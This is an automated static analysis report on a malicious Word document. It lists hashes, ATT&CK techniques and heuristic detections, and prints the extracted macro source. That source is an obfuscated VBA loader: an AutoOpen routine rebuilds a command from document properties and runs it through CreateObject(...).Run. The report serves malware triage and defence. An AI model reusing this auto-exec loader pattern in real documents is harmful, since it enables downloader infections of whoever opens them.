Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ddfc1e80e8eb4c0e…

MALICIOUS

Office (OLE)

Size: 70.0 KB
Created: 2017-08-23 21:42:00
Authoring application: Microsoft Office Word
First seen: 2017-09-14
MD5: fb9c7a466c950f3c483a9e2d4eb05c55
SHA-1: 1703d2c9619a4abdf81327c5fbf7c61aae404d33
SHA-256: ddfc1e80e8eb4c0ece096788b0ca80f9e2a2fa55011dd42e2deca7cf9e498c3e
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing heavily obfuscated VBA macros, identified by heuristics as an auto-exec loader. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' strongly suggests a downloader functionality. The VBA code, while obfuscated, uses CreateObject and execution tokens, indicating an intent to run external code, likely a second-stage payload. No specific family could be identified due to the obfuscation and generic nature of the downloader.

Heuristics (9)

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
    CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
    rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
    CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
    rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    vbBHYNaEZg
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9652 bytes
SHA-256: 3f249594475add639a9b3d741a6b18d4e89aefc510ce3188aca83d2ae9dee844
Detection
ClamAV: No threats found
Obfuscation or payload: likely
130 of 176 identifiers look randomly generated (e.g. 'zxEmtZhsZgk') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function MLFuHyshxSt()
rmdLFuLRp = 5092
Dim sGGmRKTH(5092)
ceHBVrYbk = "vgpPzmNrhb"
 sGGmRKTH(4926) = yanrFKPwWME
 sGGmRKTH(2280) = eyEurZXUv
 sGGmRKTH(2358) = zxEmtZhsZgk
 sGGmRKTH(4996) = vsYarpyZX
 sGGmRKTH(4921) = 4423 + 6222 / 4450 - 8114 - 5331 - 6918 + 4187 + 4056 + 9951
 sGGmRKTH(1427) = 1463 + 8330 + 6453 / 900 / 3661 - 4345 - 1549 + 5642 + 5235 + 9873
 sGGmRKTH(4760) = hzsCWEhUwN
 sGGmRKTH(4246) = sdcGMgwzbS
 sGGmRKTH(3549) = cFcNbsG
 sGGmRKTH(4836) = WyrNVYKc
 sGGmRKTH(1033) = 9023
 sGGmRKTH(2042) = VeavsdhDrbb
 sGGmRKTH(1491) = 1268 + 3370 / 7251 / 3179 - 8977 - 4991 + 9615
 sGGmRKTH(2853) = 216 + 8217 + 6881 / 5034 / 6787 - 7859 - 750 + 8628
  For rmdLFuLRp = 799 To 850
sGGmRKTH(rmdLFuLRp) = rmdLFuLRp
Next
UDtHzPT = sGGmRKTH(4223) + sGGmRKTH(2546) + sGGmRKTH(2883) + sGGmRKTH(3607) + sGGmRKTH(5092)
 VWWVkcCd = sGGmRKTH(941) + sGGmRKTH(750) + sGGmRKTH(230) + sGGmRKTH(419) + sGGmRKTH(1426) + sGGmRKTH(1201) + sGGmRKTH(2686) + sGGmRKTH(5092)
End Function
Function WPUGMnEkPV()
PhwDPTFFG = 9594
Dim dFxarWCCCaf(9594)
HezUwNPf = "dexbUsm"
 NyrNLMNS = "LFNrxdsHLNF"
 PELNRKhbyV = "XTvnecDA"
 dFxarWCCCaf(3644) = kgekNGZgBp
 dFxarWCCCaf(4525) = eKACDTFpHt
 dFxarWCCCaf(7470) = 9591 + 600 + 6426 / 7839 / 231 / 4510 - 7390 - 7414 + 8633
 dFxarWCCCaf(370) = 3734 + 8628 + 4054 / 5130 / 4073 / 1313 - 5337 + 2483 + 1658 + 2664
 dFxarWCCCaf(1038) = UhCmFDXTwE
 dFxarWCCCaf(9097) = nENnTnDGY
 dFxarWCCCaf(5873) = hLsbDLbcF
 dFxarWCCCaf(7200) = 2924
 dFxarWCCCaf(258) = wEYmMgMMX
 dFxarWCCCaf(259) = nsKmbphDTv
 dFxarWCCCaf(702) = AUKLfmN
 dFxarWCCCaf(269) = 7215 + 8057 + 3161 + 4977 / 1016 / 3088 / 1713 - 9534 - 6893 + 4311 + 8308
 dFxarWCCCaf(1328) = 3386 + 9258 + 8333 / 4848 / 98 - 5807 - 6466 - 2118 + 9218 + 8221
 dFxarWCCCaf(2714) = 315 + 9715 + 679 + 4339 / 8350 / 4043 - 139 - 672 - 9490 + 8395
  For PhwDPTFFG = 6296 To 4232
dFxarWCCCaf(PhwDPTFFG) = PhwDPTFFG
Next
VgvmuAUGBHu = dFxarWCCCaf(2470) + dFxarWCCCaf(8250) + dFxarWCCCaf(2481) + dFxarWCCCaf(4735) + dFxarWCCCaf(5712) + dFxarWCCCaf(1160) + dFxarWCCCaf(5445) + dFxarWCCCaf(9594)
End Function
Function nbenegXL()
kpsCWLtnGf = 3708
Dim fvBKDUyV(3708)
pwzKaas = "NsbwXxzKNa"
 fvBKDUyV(1439) = yEfpPps
 fvBKDUyV(382) = rDRHrKsL
 fvBKDUyV(3541) = fyysYfAf
 fvBKDUyV(2789) = LEnULNwm
 fvBKDUyV(797) = 1009 + 4664 + 4868 / 1385 / 5866 / 3579 - 6327 - 3471 - 3696 + 7896 + 740
 fvBKDUyV(2817) = AfkvTPN
 fvBKDUyV(1181) = BCnePTd
 fvBKDUyV(3020) = 2068
 fvBKDUyV(1234) = 2588
 fvBKDUyV(1095) = 8197
 fvBKDUyV(780) = 6028
 fvBKDUyV(824) = eSMapuRRadf
 fvBKDUyV(311) = urTmehgk
 fvBKDUyV(1206) = TBLuScZxVa
 fvBKDUyV(743) = MmxUZDkBF
 fvBKDUyV(991) = 7937 + 4085 / 9128 / 4799 - 4667 - 187 - 2384 + 6165
 fvBKDUyV(3673) = 8063 + 5428 + 7387 / 1109 / 5216 - 981 + 4235 + 4093
 fvBKDUyV(862) = 8394 + 514 + 1940 / 9342 - 8516 - 683 + 9493 + 1405 + 5911
  For kpsCWLtnGf = 1937 To 1897
fvBKDUyV(kpsCWLtnGf) = kpsCWLtnGf
Next
FScCMcSbNu = fvBKDUyV(901) + fvBKDUyV(3101) + fvBKDUyV(3708)
End Function
Sub autoopen()
vbBHYNaEZg
End Sub
Public Function ksSeMgkLWVB(WMHvxAzsmU)
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 zevsSCL = ActiveDocument.CustomDocumentProperties(WMHvxAzsmU)
ksSeMgkLWVB = zevsSCL
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 End Function
Public Function vbBHYNaEZg()
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 czhtGrd = ksSeMgkLWVB("RHmXeVcUY") + ksSeMgkLWVB("BewWdSvL") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + ksSeMgkLWVB("XRMmkXuSH") + ksSeMgkLWVB("gZFZuXdyc") + ksSeMgkLWVB("hNFftPrH")
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 yFWygTbc = ksSeMgkLWVB("DHeALmy") + ksSeMgkLWVB("UaDApyp") + ksSeMgkLWVB("LBphwbd") + ksSeMgkLWVB("sTARBmmuWkG") + ksSeMgkLWVB("ZPAewUsVr") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + ksSeMgkLWVB("SvGheyFpKtG")
rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 End Function

Function tXbKMGSsy()
HpcFtCFdEyk = 8562
Dim DdrZgdTBDs(8562)
FNNGwvmFeWA = ("rZVRZRwH")
 ZZecEuZ = ("KVykbUYvK")
 DdrZgdTBDs(2917) = VefFYzADwCR
 DdrZgdTBDs(7196) = deKSNTZuaZ
 DdrZgdTBDs(8010) = SKNAKZMB
 DdrZgdTBDs(4765) = WysWaAt
 DdrZgdTBDs(2811) = 1354 + 7986 + 3935 / 636 - 8569 - 2290 + 5162
 DdrZgdTBDs(5277) = 1091 + 8378 + 2694 / 7564 - 4788 - 4821 + 2448 + 7690 + 2898
 DdrZgdTBDs(6805) = 2194 + 3280 / 7236 / 7879 - 4966 + 87 + 5255
 DdrZgdTBDs(4987) = gDvzCfr
 DdrZgdTBDs(4670) = vaCWpVaYaM
 DdrZgdTBDs(6386) = 62
 DdrZgdTBDs(3207) = 1613
 DdrZgdTBDs(3987) = aphhBDm
 DdrZgdTBDs(2078) = 5270 + 6944 + 4072 / 9870 / 4802 / 3736 - 6243 - 87 + 416 + 567 + 3581
 DdrZgdTBDs(1724) = 457 + 4104 + 314 / 3772 / 549 / 826 - 5239 - 7241 - 9263 + 1946 + 7734 + 1512
  For HpcFtCFdEyk = 5703 To 1598
DdrZgdTBDs(HpcFtCFdEyk) = HpcFtCFdEyk
Next
nSpFspnVK = DdrZgdTBDs(7428) + DdrZgdTBDs(7363) + DdrZgdTBDs(1881) + DdrZgdTBDs(4033) + DdrZgdTBDs(5700) + DdrZgdTBDs(4053) + DdrZgdTBDs(8562)
 XSWMkmpfsds = DdrZgdTBDs(7901) + DdrZgdTBDs(3586) + DdrZgdTBDs(603) + DdrZgdTBDs(6244) + DdrZgdTBDs(3622) + DdrZgdTBDs(4403) + DdrZgdTBDs(8562)
 funKLPBbLL = DdrZgdTBDs(7396) + DdrZgdTBDs(6233) + DdrZgdTBDs(7315) + DdrZgdTBDs(8562)
End Function
Function ncvAGAxMMp()
ZBgtTbFp = 3376
Dim KUHABpfUx(3376)
zeAUarcU = ("nvzfUrMuUN")
 SGmTWxc = ("csyuwGpvG")
 KUHABpfUx(2055) = vMMxfmwkxR
 KUHABpfUx(105) = DrdzDRznttS
 KUHABpfUx(2936) = FBWKrsw
 KUHABpfUx(3101) = nUHaYmtzhH
 KUHABpfUx(1094) = 9136 + 6574 + 1345 / 4426 / 3680 / 1748 - 8371 - 7934 + 7229 + 606
 KUHABpfUx(992) = YMtSLPZGK
 KUHABpfUx(2057) = YtEsrAhEWS
 KUHABpfUx(938) = cUXuRFecB
 KUHABpfUx(703) = 8589
 KUHABpfUx(2135) = 8980
 KUHABpfUx(2736) = 2023
 KUHABpfUx(1549) = 155
 KUHABpfUx(599) = HPSnZgv
 KUHABpfUx(1255) = KKDUXTFb
 KUHABpfUx(1654) = YkHvpcsEbF
 KUHABpfUx(1498) = RcDALXkwHFH
 KUHABpfUx(2288) = 8301 + 3091 + 7425 / 264 - 2626 + 1558 + 7775 + 2055
 KUHABpfUx(2713) = 2305 + 5526 + 4756 / 1457 / 7947 - 3327 - 4974 + 4755 + 672 + 5486
 KUHABpfUx(605) = 9203 + 6555 / 5693 - 9073 + 4713
  For ZBgtTbFp = 796 To 860
KUHABpfUx(ZBgtTbFp) = ZBgtTbFp
Next
yXwkvVcE = KUHABpfUx(318) + KUHABpfUx(3376)
 GdYRPUZTyx = KUHABpfUx(1727) + KUHABpfUx(2058) + KUHABpfUx(2850) + KUHABpfUx(2303) + KUHABpfUx(1669) + KUHABpfUx(2746) + KUHABpfUx(1777) + KUHABpfUx(3376)
 xHvHDnWp = KUHABpfUx(2162) + KUHABpfUx(3333) + KUHABpfUx(246) + KUHABpfUx(1490) + KUHABpfUx(2754) + KUHABpfUx(250) + KUHABpfUx(948) + KUHABpfUx(3376)
End Function
Function zxFkhSSRP()
yKbuEVtWn = 7698
Dim gDzCKgeKr(7698)
AzmzuHzzv = ("ZMvFHypVXS")
 uPBsfHn = ("ktgFHTYf")
 gDzCKgeKr(5621) = UUFseExWHzU
 gDzCKgeKr(2887) = 1700 + 6605 / 2628 / 6750 - 6686 - 2603 + 1621 + 6544
 gDzCKgeKr(4732) = 9143 + 5313 + 7899 + 8131 / 1197 / 6242 / 8549 - 8451 + 6609
 gDzCKgeKr(5604) = 6178 + 3261 + 424 / 7830 / 8295 - 2214 - 9614 + 4657 + 8831 + 4722
 gDzCKgeKr(5971) = NCfCzvW
 gDzCKgeKr(4254) = 8463
 gDzCKgeKr(5589) = tYUgXEnZyw
 gDzCKgeKr(6720) = 8674 + 5445 / 180 / 891 - 6846 + 7432 + 4495 + 2215
 gDzCKgeKr(1356) = 9692 + 7370 / 8534 - 8956 - 7224 + 4950 + 5138 + 3800
 gDzCKgeKr(3411) = 8598 + 5961 + 8278 / 5081 / 6856 - 2935 + 667
  For yKbuEVtWn = 268 To 3876
gDzCKgeKr(yKbuEVtWn) = yKbuEVtWn
Next
ACSwDpHGYK = gDzCKgeKr(4172) + gDzCKgeKr(5618) + gDzCKgeKr(4759) + gDzCKgeKr(2875) + gDzCKgeKr(242) + gDzCKgeKr(2640) + gDzCKgeKr(5887) + gDzCKgeKr(7698)
 mcAKYmWeAZN = gDzCKgeKr(1943) + gDzCKgeKr(812) + gDzCKgeKr(3479) + gDzCKgeKr(7424) + gDzCKgeKr(1549) + gDzCKgeKr(7698)
End Function